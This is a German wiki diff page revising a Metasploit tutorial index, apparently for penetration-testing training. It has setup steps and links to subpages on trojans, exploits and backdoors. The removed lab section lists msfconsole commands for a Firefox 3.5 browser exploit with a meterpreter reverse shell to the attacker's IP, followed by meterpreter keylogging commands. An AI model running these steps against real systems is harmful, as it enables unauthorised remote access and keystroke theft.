Metasploit: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(94 dazwischenliegende Versionen von 7 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 +
=Fundamental=
 +
*[[Grundlegendes]]
 +
*[https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/ Aufbau]
 +
 +
=preparation=
 +
==Postgresql enable and start==
 +
*systemctl start postgresql
 +
*systemctl enable postgresql
 +
 +
==Init Metasploit first time==
 +
*msfdb init
 +
 +
==Apache enablen und start==
 +
*systemctl start apache2
 +
*systemctl enable  apache2
 +
=Einstieg=
 +
*[[metasploit Datenbank]]
 +
*[[metasploit Datenbank Handling]]
 +
*[[metasploit Übersicht]]
 +
*[[msfvenom]]
 +
 +
= Beispiele =
 +
* [[Metasploit handling]]
 +
* [[Metasploit trojaner windows]]
 +
* [[Metasploit trojaner linux]]
 +
* [[Metasploit script]]
 +
* [[Armitage]]
 +
* [[Metasploit Portscanning]]
 +
* [[Metasploit Schnellstart]]
 +
 +
* [[Metasploit dir_scanner]]
 +
* [[Metasploit trojaner android]]
 +
* [[Metasploit trojaner android fatrat]]
 +
* [[Metasploit browser Exlpoit]]
 +
* [[Metasploit VSFTP 2.3.4]]
 +
 +
=Weitere Beispiele=
 +
 +
*[[Metasploit Basis Aufgaben]]
 +
*[[Metasploit win2k8 Aufgaben]]
 +
 +
*[[metasploit weitere Beispiele]]
 +
 +
=misc=
 +
*[[metasploit-exploitdb]]
 +
*[[metasploit-todo]]
 +
*[[Metasploit als Pivot Host]]
  
 
=Links=
 
=Links=
 +
*[https://jonathansblog.co.uk/metasploit-tutorial-for-beginners Metasploit for beginners]
 +
*https://github.com/rapid7/metasploit-framework/
 +
*https://netsec.ws/?p=331
 
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
 
*http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/
 
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
 
*http://www.explorehacking.com/2011/03/metasploit-tutorial-with-example.html
Zeile 7: Zeile 57:
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.admin-magazin.de/Das-Heft/2009/01/Security-Auditing-mit-Metasploit/%28language%29/ger-DE
 
*http://www.metasploit.com/
 
*http://www.metasploit.com/
=Setup Opfer=
+
*http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/
Winxp Service pack 3
 
Firefox 3.5
 
 
 
=Setup Hacker=
 
Kali Linux
 
ip: 192.168.242.53
 
 
 
=vorgehen=
 
starte metasploit
 
msfconsole
 
 
 
use exploit/multi/browser/firefox_escape_retval
 
set payload windows/meterpreter/reverse_tcp/
 
set lhost 192.168.242.53 (lokaler Host)
 
set svrhost 192.168.242.53 (HTTP-Server IP)
 
set svrport 8888 (HTTP-Server Port)
 
set lport 4444 (lokaler Port)
 
set uripath /hack (optional)
 
exploit
 
 
 
jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
 
wenn wir meterpreter > sehen hat der exploit funktioniert
 
 
 
session - i 1 (in die session gehen)
 
sessions -h (zeigt optionen)
 
ps (zeigt prozesse)
 
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
 
getpid (zeigt momentanen prozess)
 
keyscan_start (startet den keyloger)
 
keyscan_dump (zeigt aufzeichnungen)
 
keyscan_stop (stopt keyloger)
 
 
 
https://fpdownload.macromedia.com/pub/flashplayer/installers/archive/fp_18.0.0.203_archive.zip
 

Aktuelle Version vom 22. Mai 2025, 09:33 Uhr

Fundamental

preparation

Postgresql enable and start

  • systemctl start postgresql
  • systemctl enable postgresql

Init Metasploit first time

  • msfdb init

Apache enablen und start

  • systemctl start apache2
  • systemctl enable apache2

Einstieg

Beispiele

Weitere Beispiele

misc

Links